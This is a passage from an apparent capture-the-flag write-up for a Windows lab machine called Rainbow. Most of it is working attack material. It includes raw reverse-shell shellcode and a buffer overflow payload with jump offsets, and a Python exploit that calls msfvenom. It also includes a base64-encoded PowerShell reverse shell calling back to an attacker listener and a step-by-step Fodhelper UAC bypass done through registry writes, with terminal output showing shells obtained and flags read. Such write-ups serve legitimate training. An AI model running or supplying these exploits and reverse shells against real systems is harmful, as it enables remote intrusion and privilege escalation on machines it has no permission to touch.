sc += b"\x53\x34\xba\xf9\xd4\xf3\x9c\x34\xe4\xa8\xdd\x57"
sc += b"\x66\xb3\x31\xb7\x57\x7c\x44\xb6\x90\x61\xa5\xea"
sc += b"\x49\xed\x18\x1a\xfd\xbb\xa0\x91\x4d\x2d\xa1\x46"
sc += b"\x05\x4c\x80\xd9\x1d\x17\x02\xd8\xf2\x23\x0b\xc2"
sc += b"\x17\x09\xc5\x79\xe3\xe5\xd4\xab\x3d\x05\x7a\x92"
sc += b"\xf1\xf4\x82\xd3\x36\xe7\xf0\x2d\x45\x9a\x02\xea"
sc += b"\x37\x40\x86\xe8\x90\x03\x30\xd4\x21\xc7\xa7\x9f"
sc += b"\x2e\xac\xac\xc7\x32\x33\x60\x7c\x4e\xb8\x87\x52"
sc += b"\xc6\xfa\xa3\x76\x82\x59\xcd\x2f\x6e\x0f\xf2\x2f"
sc += b"\xd1\xf0\x56\x24\xfc\xe5\xea\x67\x69\xc9\xc6\x97"
sc += b"\x69\x45\x50\xe4\x5b\xca\xca\x62\xd0\x83\xd4\x75"
sc += b"\x17\xbe\xa1\xe9\xe6\x41\xd2\x20\x2d\x15\x82\x5a"
sc += b"\x84\x16\x49\x9a\x29\xc3\xde\xca\x85\xbc\x9e\xba"
sc += b"\x65\x6d\x77\xd0\x69\x52\x67\xdb\xa3\xfb\x02\x26"
sc += b"\x24\x0e\xd3\x28\x7d\x66\xd1\x28\x5e\x5e\x5c\xce"
sc += b"\xca\xb0\x08\x59\x63\x28\x11\x11\x12\xb5\x8f\x5c"
sc += b"\x14\x3d\x3c\xa1\xdb\xb6\x49\xb1\x8c\x36\x04\xeb"
sc += b"\x1b\x48\xb2\x83\xc0\xdb\x59\x53\x8e\xc7\xf5\x04"
sc += b"\xc7\x36\x0c\xc0\xf5\x61\xa6\xf6\x07\xf7\x81\xb2"
sc += b"\xd3\xc4\x0c\x3b\x91\x71\x2b\x2b\x6f\x79\x77\x1f"
sc += b"\x3f\x2c\x21\xc9\xf9\x86\x83\xa3\x53\x74\x4a\x23"
sc += b"\x25\xb6\x4d\x35\x2a\x93\x3b\xd9\x9b\x4a\x7a\xe6"
sc += b"\x14\x1b\x8a\x9f\x48\xbb\x75\x4a\xc9\xcb\x3f\xd6"
sc += b"\x78\x44\xe6\x83\x38\x09\x19\x7e\x7e\x34\x9a\x8a"
sc += b"\xff\xc3\x82\xff\xfa\x88\x04\xec\x76\x80\xe0\x12"
sc += b"\x24\xa1\x20"

I noticed that a null byte seemed to truncate my input, so I’ll have it avoid that. I’m just avoiding newline and carriage return as well out of caution. If my payload doesn’t work, it would be worth doing a more complete bad character check.

I’ll add this to the top of my script, and update the data:

buffer_length = 1000
data = b""
data += b'\x90' * 50
data += sc
data += b"A" * (660 - 8 - len(data))
data += b"\xe9\x6f\xfd\xff\xff" + b"EEE"   # jmp -652
data += b"\xeb\xf6" + b"BB"                # jmp short -8
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data))

I’ll use some NOPs (\x090) at the front of the buffer to allow for any miscalculating or small differences on the remote hosts. I could also aim to jump into the middle of this NOP sled if I have issue. If a jump lands in the NOPs, it will just step forward until it reached the shellcode that follows.

After the shellcode, I pad out the remaining space, subtracting out the length of the buffer to this point.

I’ll run rainbow.exe outside of the debugger and execute the script:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.0.0.202 port 8080

At nc in another window, there’s a shell:

oxdf@hacky$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.0.0.202 57137
Microsoft Windows [Version 10.0.19045.3693]
(c) Microsoft Corporation. All rights reserved.

FLARE-VM Fri 08/01/2025 11:11:24.33
C:\Users\0xdf\Desktop>

Remote Exploit

I could just re-run msfvenom, but I’d rather make my script dynamic. I’ll update the usage:

if len(sys.argv) != 5:
    print(f"usage: {sys.argv[0]} <RHOST> <RPORT> <LHOST> <LPORT>")
    sys.exit(1)

RHOST, RPORT, LHOST, LPORT = sys.argv[1:5]

I’ll update places that referenced sys.argv to use these variables instead.

I’ll import subprocess and use it to call msfvenom:

# generate shellcode
msfvenom = subprocess.run(
    f"msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -b '\\x00\\x0a\\x0d' -f hex sc LHOST={LHOST} LPORT={LPORT}".split(),
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True,
)
print("Generating shellcode")
print(msfvenom.stderr)
sc = unhex(msfvenom.stdout)

I’ll test it locally and it still returns a shell. Now I’ll run it on Rainbow:

oxdf@hacky$ uv run --script exploit.py 10.129.234.59 8080 10.10.14.79 443
Generating shellcode
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of hex file: 702 bytes


[+] Opening connection to 10.129.234.59 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.129.234.59 port 8080

And there’s a connection at nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 49605
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\rainbow>

And I can read user.txt:

C:\Users\rainbow\Desktop>type user.txt
81a0c03b************************

I can switch to PowerShell as well:

C:\>powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\>

My full script is available here.

Shell as rainbow [admin]

Enumeration

rainbow is in the Administrators group:

PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

Still, the current process is a low integrity level process and doesn’t have the administrator privileges:

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

That means I’ll need to bypass UAC.

I already noted that rainbow.exe is a 32-bit process. Unsurprisingly, my shell is as well:

PS C:\> [Environment]::Is64BitProcess
False

It is a 64-bit machine:

PS C:\> systeminfo

Host Name:                 RAINBOW
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-70398-04661-AA533
Original Install Date:     1/16/2022, 10:54:12 AM
System Boot Time:          7/30/2025, 2:26:53 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
2,961 MBe Physical Memory:
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 4,357 MB
Virtual Memory: In Use:    1,146 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\RAINBOW
Hotfix(s):                 36 Hotfix(s) Installed.
                           [01]: KB5055175
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4486153
                           [06]: KB4493510
                           [07]: KB4499728
                           [08]: KB4504369
                           [09]: KB4512577
                           [10]: KB4512937
                           [11]: KB4521862
                           [12]: KB4523204
                           [13]: KB4535680
                           [14]: KB4539571
                           [15]: KB4549947
                           [16]: KB4558997
                           [17]: KB4562562
                           [18]: KB4566424
                           [19]: KB4570332
                           [20]: KB4577667
                           [21]: KB4587735
                           [22]: KB4589208
                           [23]: KB4598480
                           [24]: KB4601393
                           [25]: KB5000859
                           [26]: KB5001404
                           [27]: KB5003243
                           [28]: KB5003711
                           [29]: KB5005112
                           [30]: KB5060531
                           [31]: KB5006754
                           [32]: KB5008287
                           [33]: KB5043126
                           [34]: KB5055662
                           [35]: KB5058525
                           [36]: KB5005701
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.234.59
                                 [02]: fe80::2bd4:c10d:2bb:abdf
                                 [03]: dead:beef::ccc5:a045:590:57b0
                                 [04]: dead:beef::cc
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

UAC Bypass

Strategy

This post from RedFox Security has nice details about UAC and it’s bypasses. I’ll use the “Bypass using Fodhelper” technique. While the article shows it from a GUI, it’s just setting two registry keys and the running a process, so I’ll work fine from a reverse shell.

64-bit Process

It’ll be easier to work from a 64-bit process. To get a 64-bit shell, I’ll simply run the sysnative PowerShell with a reverse shell command. I’ll grab the PowerShell #3 (Base64) shell from revshells.com and run it with that powershell:

C:\>\Windows\sysnative\WindowsPowerShell\v1.0\powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA5ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

At a new nc, I get a shell and it’s 64-bit:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 49710

PS C:\rainbow> [Environment]::Is64BitProcess
True

Fodhelper

To bypass UAC using Fodhelper, I’ll need to:

  • Set the DelegateExecute property of the HKCU\Software\Classes\ms-settings\Shell\Open\command key to empty.
  • Set the (default) property of that same key to a reverse shell.
  • Start the fodhelper.exe binary.

The ms-settings key isn’t present, so I’ll first create the key:

PS C:\> New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

    Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open

Name                           Property
----                           --------
command  

Now I’ll set the two properties:

PS C:\> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

PS C:\> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -exec bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA5ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" -Force

I can verify they set:

PS C:\> Get-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"

DelegateExecute : 
(default)       : powershell -exec bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALg
                  BOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA5ACIALAA0ADQ
                  AMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABl
                  AFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AI
                  AAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoAC
                  kAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQB
                  tAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4A
                  ZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhA
                  CAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbg
                  BkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4
                  AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5
                  AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAd
                  ABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH
                  0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Now to trigger, run fodhelper.exe:

PS C:\> \Windows\system32\fodhelper.exe

And a shell connects back to another listening nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 50081

PS C:\Windows\system32>

It’s still running as rainbow, but this time with full admin privs:

PS C:\Windows\system32> whoami
rainbow\rainbow
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

I’ll get the root flag:

PS C:\users\administrator\desktop> cat root.txt
063fa02b************************